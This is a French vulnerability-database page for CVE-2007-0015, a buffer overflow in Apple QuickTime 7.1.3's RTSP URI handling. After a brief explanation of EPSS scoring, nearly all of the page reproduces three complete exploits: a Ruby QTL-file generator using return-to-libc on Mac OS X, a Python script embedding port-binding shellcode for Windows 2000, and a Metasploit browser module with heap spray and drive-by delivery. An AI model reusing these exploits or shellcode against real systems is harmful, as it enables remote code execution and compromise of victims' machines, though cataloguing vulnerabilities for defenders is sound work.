CVE-2007-0015 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#!/usr/bin/ruby # Copyright (c) LMH <lmh [at] info-pull.com> # Kevin Finisterre <kf_lists [at] digitalmunition.com> # # Notes: # Our command string is loaded on memory at a static address normally, # but this depends on execution method and the string length. The address set in this exploit will # be likely successful if we open the resulting QTL file directly, without having an # instance of Quicktime running. Although, when using another method and string, you'll need # to find the address. # For 100% reliable exploitation you can always use the /bin/sh address, # but that's not as a cool as having your box welcoming the new year. # Do whatever you prefer. That said, enjoy. # # see http://projects.info-pull.com/moab/MOAB-01-01-2007.html # Command string: Use whatever you like. # Remember that changing this will also need a change of the target address for system(), # unless string length is the same. CMD_STRING = "/usr/bin/say Happy new year shit bag" # Mac OS X 10.4.8 (8L2127) EBP_ADDR = 0xdeadbabe SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back SETUID_ADDR = 0x900334f0 CURL_ADDR = 0x916c24bc # /usr/bin/curl SHELL_ADDR = 0x918bef3a # /bin/sh CMDSTR_ADDR = [ SHELL_ADDR, # 0 addr to static /bin/sh (lame) 0x17a053c, # 1 addr to our command string (cool) :> (change as necessary) 0xbabeface, # 2 bogus addr for testing. CURL_ADDR # 3 addr to '/usr/bin/curl' ] # Payload HAPPY = ("A" * 299) + [EBP_ADDR].pack("V") + [SYSTEM_ADDR].pack("V") + [SETUID_ADDR].pack("V") + [CMDSTR_ADDR[1]].pack("V") # change array index for using diff. addr # Sleds: not necessary if using /bin/bash addr or other built-in addresses. # although, for using our own fu, we need to spray some data for better reliability # the goal is causing allocation of large heap chunks NEW = ("\x90" * 30000) + CMD_STRING # feed the heap YEAR = ("\x90" * 30000) + CMD_STRING # go johnny, go APPLE = ("\x90" * 30000) + "EOOM" # feed the heap more BOYZ = ("\x90" * 30000) + "FOOM" # and more # QTL output template QTL_CONTENT = "<?xml version=\"1.0\"?>" + "<?quicktime type=\"application/x-quicktime-media-link\"?>" + "<embed autoplay=\"true\" moviename=\"#{NEW}\" " + "qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" " + "src=\"rtsp://#{BOYZ}:#{HAPPY}\" />\n" target_file = File.open("pwnage.qtl", "w+") { |f| f.print(QTL_CONTENT) f.close } # milw0rm.com [2007-01-01]

#!/usr/bin/python #Port bind exploit for apple quicktime rtsp vulnerability #Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy #to port the exploit to others. All one needs to do is look for the appropriate #jump address. Certain characters are not permitted in the shellcode. #Alphanumeric shellcodes work fine. #This script creates a qtl file which when clicked upon binds a shell to TCP #port 4444. This file can be delivered through several means; HTTP, SMTP etc # # Winny Thomas ;-) # Author shall bear no responsibility for any kind of screws up caused by using # this code import sys #alpha numeric port bind shellcode from metasploit; binds shell to port 4444 shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58" shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57" shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38" shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58" shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48" shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54" shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d" shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38" shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56" shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57" shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30" shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34" shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41" shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d" shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46" shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c" shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32" shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f" shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36" shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56" shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" shellcode += "\x4f\x4f\x42\x4d\x5a\x90" shellcode += "\x90" * 90 def CreateQTL(sp): if sp == "1": JMPedi = '\xf5\x0c\xe5\x77' #Address of jmp edi from user32.dll elif sp == "2": JMPedi = '\x34\xd9\xe4\x77' #Address of jmp edi from user32.dll else: print 'Unsupported Service pack number' sys.exit(-1) #XML template from http://www.milw0rm.org/exploits/3064 QTL = "<?xml version=\"1.0\"?>" QTL += "<?quicktime type=\"application/x-quicktime-media-link\"?>" QTL += "<embed autoplay=\"true\" moviename=\"#{NEW}\" " QTL += "qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" " QTL += "src=\"rtsp://" + '\x90'*200 + shellcode + '\x90'*9000 + ':' + '\x90'*811 + JMPedi QTL += "\" />\n" fd = open('./exp.qtl', 'w') fd.write(QTL) fd.close() if __name__ == '__main__': try: sp = sys.argv[1] except IndexError: print 'Usage: %s <version number>\n' % sys.argv[0] print 'Version: 1 => windows 2000 server SP0' print 'Version: 2 => windows 2000 server SP4' sys.exit(-1) CreateQTL(sp) # milw0rm.com [2007-01-03]

## # $Id: apple_quicktime_rtsp.rb 9220 2010-05-04 23:09:32Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name => OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, # reliable memory corruption :vuln_test => nil, }) def initialize(info = {}) super(update_info(info, 'Name' => 'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in Apple QuickTime 7.1.3. This module was inspired by MOAB-01-01-2007. The Browser target for this module was tested against IE 6 and Firefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the QuickTime plugin. }, 'Author' => [ 'MC', 'egypt' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9220 $', 'References' => [ [ 'CVE', '2007-0015' ], [ 'OSVDB', '31023'], [ 'BID', '21829' ], [ 'URL', 'http://projects.info-pull.com/moab/MOAB-01-01-2007.html' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 500, 'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c", }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], [ 'Apple QuickTime Player 7.1.3', { 'Ret' => 0x6855d8a2 # xpsp2/2k3 :( | vista ;) } ], [ 'Browser Universal', { 'Ret' => 0x0c0c0c0c # tested on xpsp0 and sp2 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Jan 1 2007', 'DefaultTarget' => 0)) end def on_request_uri(client, request) return if ((p = regenerate_payload(client)) == nil) if (target.name =~ /Automatic/) if (request['User-Agent'] =~ /QuickTime/i) target = targets[1] else target = targets[2] end end cruft = rand_text_alphanumeric(4) # This is all basically filler on the browser target because we can't # expect the SEH to be in a reliable place across multiple browsers. # Heap spray ftw. sploit = rand_text_english(307) sploit << p.encoded + "\xeb\x06" + rand_text_english(2) sploit << [target.ret].pack('V') + [0xe8, -485].pack('CV') if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.qtl$/) print_status("Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...") print_status("Trying target #{target.name}...") content = build_qtl(sploit) else print_status("Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...") shellcode = Rex::Text.to_unescape(p.encoded) url = ((datastore['SSL']) ? "https://" : "http://") url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST']) url << ":" + datastore['SRVPORT'] url << get_resource js = <<-ENDJS #{js_heap_spray} sprayHeap(unescape("#{shellcode}"), 0x#{target.ret.to_s 16}, 0x4000); ENDJS content = "<html><body><script><!--\n#{js}//--></script>" content << <<-ENDEMBED <OBJECT CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" WIDTH="1" HEIGHT="1" CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab"> <PARAM name="SRC" VALUE = "#{url}/#{cruft}.qtl"> <PARAM name="QTSRC" VALUE = "#{url}/#{cruft}.qtl"> <PARAM name="AUTOPLAY" VALUE = "true" > <PARAM name="TYPE" VALUE = "video/quicktime" > <PARAM name="TARGET" VALUE = "myself" > <EMBED SRC = "#{url}/#{cruft}.qtl" QTSRC = "#{url}/#{cruft}.qtl" TARGET = "myself" WIDTH = "1" HEIGHT = "1" AUTOPLAY = "true" PLUGIN = "quicktimeplugin" TYPE = "video/quicktime" CACHE = "false" PLUGINSPAGE= "http://www.apple.com/quicktime/download/" > </EMBED> </OBJECT> ENDEMBED content << "</body></html>" end send_response(client, content, { 'Content-Type' => "text/html" }) # Handle the payload handler(client) end def build_qtl(overflow) cruft = rand_text_english(4) content = "<?xml version=\"1.0\"?>\n" content << "<?quicktime type=\"application/x-quicktime-media-link\"?>\n" content << "<embed autoplay=\"true\" \n" content << "moviename=\"#{cruft}\" \n" content << "qtnext=\"#{cruft}\" \n" content << "type=\"video/quicktime\" \n" content << "src=\"rtsp://#{cruft}:#{overflow}\" />\n" end end